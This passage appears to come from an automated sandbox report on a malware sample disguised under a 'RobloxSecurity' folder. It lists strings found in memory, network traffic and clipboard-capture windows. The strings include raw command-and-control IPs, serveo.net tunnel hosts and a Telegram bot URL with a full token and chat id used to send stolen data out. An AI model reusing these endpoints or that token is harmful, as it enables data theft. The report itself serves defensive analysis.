Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.41.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co(=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://13.231.21.109:443
Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://164.90.185.9:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://18.178.28.151:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://185.217.98.121:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://44.228.161.50:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://64.227.21.98:443
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.se
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net
Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net/
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
